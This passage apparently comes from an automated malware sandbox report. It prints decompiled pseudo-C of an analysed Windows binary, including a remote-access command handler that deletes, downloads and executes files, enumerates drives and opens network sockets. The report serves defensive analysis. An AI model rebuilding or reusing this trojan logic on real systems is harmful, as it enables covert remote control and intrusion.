						asm("lock xadd [0x469024], eax");
						if(1 == 0) {
							_push(_t57);
							_t58 = 0x46a050;
							do {
								L0042FF95(_t58);
								_t58 = _t58 + 0x18;
								__eflags = _t58 - 0x46a110;
							} while (_t58 < 0x46a110);
						}
						return _t55;
					}
				} else {
					return 0;
				}
			}

0x00401617
0x00401619
0x0040161e
0x00401624
0x00401629
0x0040162c
0x0040162e
0x00401635
0x00401639
0x0040163d
0x00401660
0x00401661
0x00401667
0x00000000
0x0040163f
0x0040163f
0x00401645
0x00000000
0x00401647
0x00401647
0x0040164a
0x0040164c
0x00000000
0x0040164e
0x0040164f
0x00401655
0x00401658
0x0040165b
0x00401669
0x0040166c
0x0040166c
0x0040164c
0x00401645
0x00401630
0x00401630
0x0042f68b
0x0042f68c
0x0042f68e
0x0042f694
0x0042f6a2
0x0042f6a7
0x0042f6a8
0x0042f6a9
0x0042f6b4
0x0042f6c2
0x0042f6c7
0x0042f6c8
0x0042f6ce
0x0042f6d4
0x0042f6e2
0x0042f6e7
0x0042f6eb
0x0042f6ed
0x0042f6ee
0x0042f6f6
0x0042f6f8
0x0042f6f9
0x0042f6fe
0x0042f6ff
0x0042f704
0x0042f708
0x0042f708
0x0042f710
0x0042f714
0x0042f714
0x00401620
0x00401623
0x00401623

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489bfb5676ac33e50574f7b124679ffdc154b0e9dd961ead9e57ba2a21ccc5d6
Instruction ID: 82aacffa352770fd3a4df3836a956c52b669c2e681edcc578459bd2f50851f34
Opcode Fuzzy Hash: 489bfb5676ac33e50574f7b124679ffdc154b0e9dd961ead9e57ba2a21ccc5d6
Instruction Fuzzy Hash: 4CF0E2712142085BCB1C9F349C50A7A37999B04368F684B3FF02ADA2E0D77AD986820C

Uniqueness

Uniqueness Score: -1.00%

Function 0043B9BC, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043B9BC(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46a4d0 == 0) {
					_push(_t15);
					L004459B9(__ecx); // executed
					_t2 = L00445CBA(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = L0043BA69(__ebx, _t19);
						if(_t3 != 0) {
							 *0x46a4dc = _t3;
							E00441003(0x46a4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						L0043E9A5(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					L0043E9A5(_t19);
					return _t16;
				} else {
					return 0;
				}
			}

0x0043b9c3
0x0043b9c9
0x0043b9ca
0x0043b9cf
0x0043b9d4
0x0043b9d8
0x0043b9e0
0x0043b9e8
0x0043b9f5
0x0043b9fa
0x0043b9ff
0x0043b9ea
0x0043b9ea
0x0043b9ea
0x0043ba03
0x0043b9da
0x0043b9da
0x0043b9da
0x0043ba0a
0x0043ba14
0x0043b9c5
0x0043b9c7
0x0043b9c7

APIs

_free.LIBCMT ref: 0043BA0A

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 28dd9db517a1ba2e7944015faaef42a099c4a6dde7cd035fda682be22e9847b7
Instruction ID: 3f6a6edbb6fd3bacbff2bcce2bb57f2b096988e6b401bab523f464e2d72b0113
Opcode Fuzzy Hash: 28dd9db517a1ba2e7944015faaef42a099c4a6dde7cd035fda682be22e9847b7
Instruction Fuzzy Hash: 14E0E592606D1015FA61323B7C0A76B0555CFC9339F11122FF610961D1EFAC484265DF

Uniqueness

Uniqueness Score: -1.00%

Function 00417E77, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00417E77(void* __ecx, void* __edx, void* __eflags) {
				signed int _t21;
				intOrPtr _t28;
				intOrPtr* _t31;
				signed int* _t37;
				void* _t39;
				signed int _t46;
				signed int _t56;
				void* _t58;
				void* _t60;

				_t39 = __ecx;
				E00450448(0x451a12, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0xc;
				_t21 = E00402664( *(_t58 + 8)); // executed
				_t56 = _t21;
				 *(_t58 - 0x18) = _t56;
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x14)) = E0040207D();
				_t37 = E00402086(_t39);
				E00418010( *_t37,  *_t22, _t56);
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *(_t58 - 0x18) = E0040213F(_t39);
				if( *_t37 != 0) {
					L00402681( *_t37,  *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))));
					_t31 = L0040266D();
					asm("cdq");
					_t46 = 0x18;
					L0040265F( *_t37, ( *_t31 -  *_t37) / _t46);
				}
				 *((intOrPtr*)(L0040266D())) =  *(_t58 + 8) * 0x18 + _t56;
				_t28 =  *(_t58 - 0x18) * 0x18 + _t56;
				 *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))) = _t28;
				 *_t37 = _t56;
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t28;
			}

0x00417e77
0x00417e7c
0x00417e87
0x00417e8f
0x00417e94
0x00417e96
0x00417e99
0x00417ea6
0x00417eae
0x00417eb5
0x00417eba
0x00417ec5
0x00417ecb
0x00417ed4
0x00417edb
0x00417ee4
0x00417ee7
0x00417eed
0x00417eed
0x00417eff
0x00417f05
0x00417f0a
0x00417f0c
0x00417f11
0x00417f1e

APIs

__EH_prolog.LIBCMT ref: 00417E7C

Part of subcall function 0040265F: std::_Deallocate.LIBCONCRT ref: 00402A59

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prologstd::_
String ID:
API String ID: 3881773970-0
Opcode ID: 7cb06de72b666700771b989a15199aed1ed9f0768719cec061506d687a494617
Instruction ID: 765d6710915dfb8cb457f2f39f12cf5b92f1efe624271d6e8d2a74905b590e82
Opcode Fuzzy Hash: 7cb06de72b666700771b989a15199aed1ed9f0768719cec061506d687a494617
Instruction Fuzzy Hash: 2311A271A002149FCF05EF69C986A6DBBB6EF85314F10416FF500AB2E1DBB60E00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00446A34, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00446A34(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E0043DAF9(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							L00440D01(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				L0043E9A5(0);
				return _t31;
			}

0x00446a39
0x00446a3a
0x00446a41
0x00446a46
0x00446a4a
0x00446a4e
0x00446a51
0x00446a57
0x00446a57
0x00446a5d
0x00446a5f
0x00446a62
0x00446a62
0x00446a65
0x00446a67
0x00446a6d
0x00446a71
0x00446a76
0x00446a7a
0x00446a7c
0x00446a7f
0x00446a85
0x00446a8c
0x00446a90
0x00446a94
0x00446a97
0x00446a97
0x00446a9b
0x00446a9e
0x00446a53
0x00446a53
0x00446a53
0x00446aa0
0x00446aad

APIs

Part of subcall function 0043DAF9: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00440547,00000001,00000364,?,00000000,00000000,00435FA8,00000000,?,?,0043602C,00000000), ref: 0043DB3A

_free.LIBCMT ref: 00446AA0

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 187015bb3264e684158b9257feab091b9becc32fa95f4bfb36b8bf8aa8a3161f
Instruction ID: f8d022b96b5429b676f389167df2d752d4430f92efbe8a72c507e0b196326f55
Opcode Fuzzy Hash: 187015bb3264e684158b9257feab091b9becc32fa95f4bfb36b8bf8aa8a3161f
Instruction Fuzzy Hash: 8C012BB22007455BF321CE66988595AFBE9EB8A370F25051EE18463280E634A805C729

Uniqueness

Uniqueness Score: -1.00%

Function 0043DAF9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043DAF9(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x46aa48, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = L0043D777();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(L00439BAF())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0043B1F4(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x0043daf9
0x0043daff
0x0043db04
0x0043db12
0x0043db12
0x0043db18
0x0043db1a
0x0043db1a
0x0043db31
0x0043db3a
0x0043db42
0x00000000
0x00000000
0x0043db22
0x0043db24
0x0043db46
0x0043db4b
0x0043db51
0x00000000
0x0043db51
0x0043db27
0x0043db2c
0x0043db2d
0x0043db2f
0x00000000
0x00000000
0x0043db2f
0x00000000
0x0043db31
0x0043db0a
0x0043db10
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00440547,00000001,00000364,?,00000000,00000000,00435FA8,00000000,?,?,0043602C,00000000), ref: 0043DB3A

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 20c3d45feffd3951a4556d16d38d285ce942fbfef7972a1612f0b6b93e3fb05e
Instruction ID: e83af7a61bb8f4db85595462dd71f569a1abb9ac3994b55621686825a7cf9e85
Opcode Fuzzy Hash: 20c3d45feffd3951a4556d16d38d285ce942fbfef7972a1612f0b6b93e3fb05e
Instruction Fuzzy Hash: 9BF0B431E0462466DB215E26BD02B9BF75D9F8D7A0F166023A904E6280CB68FC0196E9

Uniqueness

Uniqueness Score: -1.00%

Function 0043E13D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0043E13D(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(L00439BAF())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46aa48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = L0043D777();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043B1F4(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0043e13d
0x0043e143
0x0043e149
0x0043e17b
0x0043e180
0x0043e186
0x00000000
0x0043e186
0x0043e14d
0x0043e14f
0x0043e14f
0x0043e166
0x0043e16f
0x0043e177
0x00000000
0x00000000
0x0043e157
0x0043e159
0x00000000
0x00000000
0x0043e15c
0x0043e161
0x0043e162
0x0043e164
0x00000000
0x00000000
0x0043e164
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,0042F6D9,?,?,00430DF7,?,?,0046B4E0,?,?,0040B6B7,0042F6D9,?,?,?,?), ref: 0043E16F

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0711d195eae90c1ba913ecedb98c576389279e2d95cfcf9b93c281c9b9135b28
Instruction ID: 65ee76f819859148cc74af8bde06e2746675d0715f84f3e568587c298f6b8650
Opcode Fuzzy Hash: 0711d195eae90c1ba913ecedb98c576389279e2d95cfcf9b93c281c9b9135b28
Instruction Fuzzy Hash: 44E06D31606624A6EE312767AC01B9B7659DF8D7B0F152127AC04A62D0DBB8DC01C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040484C, Relevance: 1.5, APIs: 1, Instructions: 28
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040484C(char* __ecx) {
				intOrPtr _t6;
				char _t11;
				char* _t12;

				_t12 = __ecx;
				if( *0x46aaab != 0) {
					L3:
					__imp__#23(0, 1, 6); // executed
					 *((intOrPtr*)(_t12 + 4)) = _t6;
					if(_t6 == 0xffffffff) {
						L2:
						return 0;
					}
					_t11 =  *0x46aae0; // 0x0
					 *((char*)(_t12 + 0x50)) = 0;
					 *((intOrPtr*)(_t12 + 0x54)) = 0;
					 *((intOrPtr*)(_t12 + 0x4c)) = 0x3e8;
					 *((char*)(_t12 + 0x65)) = 0;
					 *_t12 = _t11;
					return 1;
				}
				_t6 = E00404898(); // executed
				if(_t6 != 0) {
					goto L3;
				}
				goto L2;
			}

0x00404855
0x00404857
0x00404866
0x0040486d
0x00404873
0x00404879
0x00404862
0x00000000
0x00404862
0x0040487b
0x00404883
0x00404886
0x00404889
0x00404890
0x00404893
0x00000000
0x00404893
0x00404859
0x00404860
0x00000000
0x00000000
0x00000000

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 0040486D

Part of subcall function 00404898: WSAStartup.WS2_32(00000202,00000000), ref: 004048AD

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Startupsocket
String ID:
API String ID: 3996037109-0
Opcode ID: 0009efa447480ac7162edf8e32fe21f236245f444557579be3d43ba06963fae9
Instruction ID: ccc472eb66b8000e005c3386e7ff86f7e1ac4ebdeabd62ef936573a688cb9eec
Opcode Fuzzy Hash: 0009efa447480ac7162edf8e32fe21f236245f444557579be3d43ba06963fae9
Instruction Fuzzy Hash: 30F020B6440BD09AD7606B7408443937BC46B92318F088DBFE2C2737C2D2B95808C72A

Uniqueness

Uniqueness Score: -1.00%

Function 00404898, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,00000000), ref: 004048AD

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: a19467ebbac9144480ba84676d3739668ad2e0483cebf15b16c4f36432ecd58f
Instruction ID: 517fadebee8ecea024088892bf82e9b33c168bf53452fb9c904b788729c87c7e
Opcode Fuzzy Hash: a19467ebbac9144480ba84676d3739668ad2e0483cebf15b16c4f36432ecd58f
Instruction Fuzzy Hash: 73D0123255861C4EE610AAB4AD0F8A5775CC313611F0003BBADB5935D3F680572CC6FB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00406496, Relevance: 39.2, APIs: 7, Strings: 15, Instructions: 699
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00406496(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v196;
				void* _v200;
				void* _v204;
				char _v208;
				char _v212;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				void* _v240;
				void* _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				void* _v308;
				char _v312;
				char _v324;
				char _v332;
				char _v336;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t167;
				signed int _t169;
				void* _t173;
				void* _t178;
				signed int _t179;
				void* _t194;
				void* _t207;
				signed int _t209;
				void* _t222;
				int _t233;
				void* _t241;
				void* _t242;
				void* _t254;
				signed int _t265;
				void* _t268;
				void* _t273;
				void* _t278;
				void* _t285;
				short* _t294;
				void* _t295;
				void* _t306;
				void* _t321;
				void* _t330;
				void* _t336;
				void* _t338;
				void* _t340;
				void* _t345;
				void* _t349;
				void* _t357;
				void* _t381;
				void* _t384;
				void* _t545;
				void* _t546;
				void* _t585;
				intOrPtr _t590;
				intOrPtr _t591;
				signed int _t592;
				signed int _t594;
				signed int _t596;
				void* _t603;
				void* _t605;
				void* _t607;
				void* _t608;
				void* _t610;
				signed int _t611;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t617;
				void* _t618;
				void* _t619;
				void* _t620;
				void* _t623;
				void* _t628;
				void* _t629;
				void* _t630;
				void* _t634;
				void* _t656;
				void* _t657;
				void* _t658;
				void* _t659;
				void* _t663;

				_t662 = __eflags;
				_t550 = __edx;
				_push(_t357);
				_t590 = _a4;
				_push(_t585);
				E00402036(_t357,  &_v156, __edx, __eflags, _t590 + 0x1c);
				SetEvent( *(_t590 + 0x34));
				_t591 =  *((intOrPtr*)(E00401EF9( &_v160)));
				E00404153( &_v160,  &_v136, 4, 0xffffffff);
				_t614 = (_t611 & 0xfffffff8) - 0xec;
				E00402036(0x46b218, _t614, _t550, _t662, 0x46b218);
				_t615 = _t614 - 0x18;
				E00402036(0x46b218, _t615, _t550, _t662,  &_v152);
				E00416EC5( &_v288, _t550);
				_t616 = _t615 + 0x30;
				_t663 = _t591 - 0x8b;
				if(_t663 > 0) {
					_t592 = _t591 - 0x8c;
					__eflags = _t592;
					if(__eflags == 0) {
						E0040412C(0x46b218,  &_v256, E00401E4F(E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags)));
						E00401E54();
						_t167 = GetFileAttributesW(E00401E4F( &_v260));
						__eflags = _t167 & 0x00000010;
						if((_t167 & 0x00000010) == 0) {
							_t169 = DeleteFileW(E00401E4F( &_v260));
						} else {
							_t169 = E004170D3(E00401E4F( &_v260));
						}
						__eflags = _t169;
						__eflags = _t169 & 0xffffff00 | _t169 != 0x00000000;
						if(__eflags == 0) {
							_t617 = _t616 - 0x18;
							E00416D80(0x46b218, _t617,  &_v252);
							_push(0x55);
							E0040495D(0x46b218, 0x46b2c8,  &_v252, __eflags);
							_t173 = E00416D1F( &_v256,  &_v280);
							_t618 = _t617 - 0x18;
							_t554 = "Unable to delete: ";
							E0040713C(0x46b218, _t618, "Unable to delete: ", _t585, __eflags, _t173);
							_t619 = _t618 - 0x14;
							_t381 = _t619;
							_push("[ERROR]");
						} else {
							_t194 = E00416D1F( &_v228,  &_v252);
							_t623 = _t616 - 0x18;
							_t554 = "Deleted file: ";
							E0040713C(0x46b218, _t623, "Deleted file: ", _t585, __eflags, _t194);
							_t619 = _t623 - 0x14;
							_t381 = _t619;
							_push("[Info]");
						}
						E00401FCE(0x46b218, _t381);
						E00416673(0x46b218, _t585);
						_t620 = _t619 + 0x30;
						E00401F11();
						_t178 = E00401DAD( &_v288, _t554, __eflags, 1);
						_t550 = "1";
						_t384 = _t178;
						_t179 = E0040592C("1");
						__eflags = _t179;
						if(_t179 == 0) {
							L40:
							L41:
							E00401E54();
							L42:
							E00401DD8( &_v284, _t550);
							E00401F11();
							E00401F11();
							return 0;
						} else {
							__eflags = E00406E5B( &_v272, _t384, _t384) + 1;
							E00406E77(E00406E5B( &_v272, _t384, _t384) + 1);
							_t550 =  &_v284;
							E00401E5E( &_v284,  &_v284, _t592, E00402EEE(0x46b218,  &_v260,  &_v284, 0x2a));
							E00401E54();
							E0040412C(0x46b218, _t620 - 0x18, E00401E4F( &_v288));
							L39:
							E00405CDC();
							goto L40;
						}
					}
					_t594 = _t592 - 1;
					__eflags = _t594;
					if(__eflags == 0) {
						E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags);
						E00416DA4(E00401DAD( &_v268, _t197, __eflags, 1), __eflags);
						E00406E43( &_v268,  &_v196,  &_v260, E00406E5B( &_v260,  &_v212,  &_v212) + 1);
						_t207 = E00401E4F(E004071C7( &_v256,  &_v208,  &_v232));
						_t209 = E00438FCF(E00401E4F( &_v280), _t207);
						asm("sbb bl, bl");
						E00401E54();
						_t362 =  ~_t209 + 1;
						__eflags =  ~_t209 + 1;
						if(__eflags == 0) {
							_t550 = E00407160( &_v228, "Unable to rename file!", __eflags, 0x46b218);
							E004051FC(_t362, _t616 - 0x18, _t211, _t585, __eflags, "16");
							_push(0x59);
							E0040495D(_t362, 0x46b2c8, _t211, __eflags);
							E00401F11();
						} else {
							_t550 =  &_v180;
							E0040708E(_t616 - 0x18,  &_v180, __eflags, "*");
							E00405CDC();
						}
						E00401E54();
						L13:
						E00401E54();
						goto L40;
					}
					_t596 = _t594 - 1;
					__eflags = _t596;
					if(__eflags == 0) {
						E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags);
						_t222 = E00416DA4(E00401DAD( &_v268, _t219, __eflags, 1), __eflags);
						_t550 =  &_v260;
						CreateDirectoryW(E00401E4F(E004071A3(0x46b218,  &_v236,  &_v260, __eflags, _t222)), 0);
						E00401E54();
						E00401E54();
						E004031F4(0x2a);
						E00406E88(0x46b218, _t616 - 0x18,  &_v260, __eflags,  &_v264);
						goto L39;
					}
					_t598 = _t596 - 3;
					__eflags = _t596 - 3;
					if(__eflags != 0) {
						goto L42;
					}
					_t233 = StrToIntA(E00401EF9(E00401DAD( &_v264, _t550, __eflags, _t598)));
					_t550 = E00401E4F(E00416DA4(E00401DAD( &_v268, _t550, __eflags, 1), __eflags));
					E00417893(_t233, _t236);
					goto L41;
				}
				if(_t663 == 0) {
					E0040201F(0x46b218,  &_v180);
					E00404712(0x46b218,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004048C2(_t550);
					_t241 = E00401DAD( &_v284, _t550, __eflags, 3);
					_t628 = _t616 - 0xfffffffffffffff8;
					_t242 = E00401DAD( &_v288, _t550, __eflags, 2);
					E00402ECA(0x46b218, _t628, E00402ECA(0x46b218,  &_v236, E00402ECA(0x46b218,  &_v284, E0040704B( &_v260, E00401DAD( &_v292, _t550, __eflags, 1), 0x46b218), __eflags, _t242), __eflags, 0x46b218), __eflags, _t241);
					E0040495D(0x46b218,  &_v140, _t246, __eflags);
					E00401F11();
					E00401F11();
					E00401F11();
					_t254 = E00416D1F( &_v292, E00416DA4(E00401DAD( &_v324, _t246, __eflags, 0), __eflags));
					_t629 = _t628 - 0x18;
					E0040713C(0x46b218, _t629, "Downloading file: ", _t616 - 0x10, __eflags, _t254);
					_t630 = _t629 - 0x14;
					_t588 = "[Info]";
					E00401FCE(0x46b218, _t630, "[Info]");
					E00416673(0x46b218, "[Info]");
					E00401F11();
					E00401E54();
					_t569 = E00401DAD( &_v332, "Downloading file: ", __eflags, 0);
					E00416DA4(_t260, __eflags);
					_t265 = E00405DF1( &_v184, __eflags, E00438F4B(_t262, E00401EF9(E00401DAD( &_v336, _t260, __eflags, 4)), 0, 0xa), _t260, 0x56);
					_t634 = _t630 + 0x30 - 0x18 + 0x2c;
					__eflags = _t265;
					if(__eflags == 0) {
						_t268 = E00416D1F( &_v264, E00416DA4(E00401DAD( &_v296, _t569, __eflags, 0), __eflags));
						_t550 = "Failed to download file: ";
						E0040713C(0x46b218, _t634 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t268);
						E00401FCE(0x46b218, _t634 - 4, "[ERROR]");
						E00416673(0x46b218, "[Info]");
						E00401F11();
						_t273 = E00401E54();
					} else {
						_t278 = E00416C0A(0x46b218,  &_v260, E004023D3());
						_t638 = _t634 - 0x18;
						E0040713C(0x46b218, _t634 - 0x18, "Downloaded file size: ", "[Info]", __eflags, _t278);
						E00401FCE(0x46b218, _t638 - 0x14, "[DEBUG]");
						E00416673(0x46b218, "[Info]");
						E00401F11();
						_t285 = E00416D1F( &_v268, E00416DA4(E00401DAD( &_v300, "Downloaded file size: ", __eflags, 0), __eflags));
						_t550 = "Downloaded file: ";
						E0040713C(0x46b218, _t638 - 0x14 + 0x30 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t285);
						E00401FCE(0x46b218, _t638 - 0x14 + 0x30 - 4, "[Info]");
						E00416673(0x46b218, "[Info]");
						E00401F11();
						E00401E54();
						E00401FCE(0x46b218, _t638 - 0x14 + 0x30 - 4 + 0x30 - 0x18, 0x45e65c);
						_push(0x58);
						_t273 = E0040495D(0x46b218,  &_v156, "Downloaded file: ", __eflags);
					}
					E00404CC1(_t273,  &_v140);
					E00404CD3(0x46b218,  &_v140, _t550, _t588, 0);
					L15:
					E00401F11();
					goto L42;
				}
				_t603 = _t591 - 0x61;
				if(_t603 == 0) {
					E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags);
					_t294 = E00401DAD( &_v268, _t292, __eflags, 2);
					_t295 = E00401DAD( &_v272, _t292, __eflags, 1);
					_t550 = _t294;
					E00416407(_t295, _t294);
					goto L42;
				}
				_t605 = _t603 - 0x26;
				if(_t605 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E00401FF5(0x46b218,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E00406ECF( &_v260, 0x45e7e4, 0, 2) + 1;
					E00401EE8(E00406ECF( &_v260, 0x45e7e4, 0, 2) + 1);
					E00402036(0x46b218, _t616 - 0x18, _t550, E00406ECF( &_v260, 0x45e7e4, 0, 2) + 1,  &_v276);
					_t306 = E00405F1F(0x46b218,  &_v208);
					_t550 = E0040704B( &_v232,  &_v280, 0x46b218);
					E00402E54(_t616 - 0x18, _t307, _t306);
					_push(0x51);
					E0040495D(0x46b218, 0x46b2c8, _t307, __eflags);
					E00401F11();
					E00401F11();
					goto L15;
				}
				_t607 = _t605 - 1;
				if(_t607 == 0) {
					E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags);
					E00406E88(0x46b218, _t616 - 0x18, _t312, __eflags,  &_v256);
					E00405CDC();
					__eflags = E004023D3() - 2;
					_t321 = E00416D1F( &_v224, E00406E43( &_v260,  &_v188,  &_v260, E004023D3() - 2));
					_t550 = "Browsing directory: ";
					E0040713C(0x46b218, _t616 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t585, E004023D3() - 2, _t321);
					E00401FCE(0x46b218, _t616 - 0x18 + 0x18 - 4, "[Info]");
					E00416673(0x46b218, _t585);
					E00401F11();
					goto L13;
				}
				_t608 = _t607 - 1;
				if(_t608 == 0) {
					E00416DA4(E00401DAD( &_v264, _t550, __eflags, 0), __eflags);
					ShellExecuteW(0, L"open", E00401E4F( &_v256), 0, 0, 1);
					_t330 = E00416D1F( &_v208,  &_v256);
					_t550 = "Executing file: ";
					E0040713C(0x46b218, _t616 - 0x18, "Executing file: ", _t585, __eflags, _t330);
					E00401FCE(0x46b218, _t616 - 4, "[Info]");
					E00416673(0x46b218, _t585);
					E00401F11();
					goto L40;
				}
				_t610 = _t608 - 1;
				_t668 = _t610;
				if(_t610 == 0) {
					E00406E30( &_v108);
					_t336 = E00401DAD( &_v264, _t550, _t668, 3);
					_t656 = _t616 - 0x18;
					E00402036(0x46b218, _t656, _t550, _t668, _t336);
					_t338 = E00401DAD( &_v272, _t550, _t668, 2);
					_t657 = _t656 - 0x18;
					E00402036(0x46b218, _t657, _t550, _t668, _t338);
					_t340 = E00401DAD( &_v280, _t550, _t668, 1);
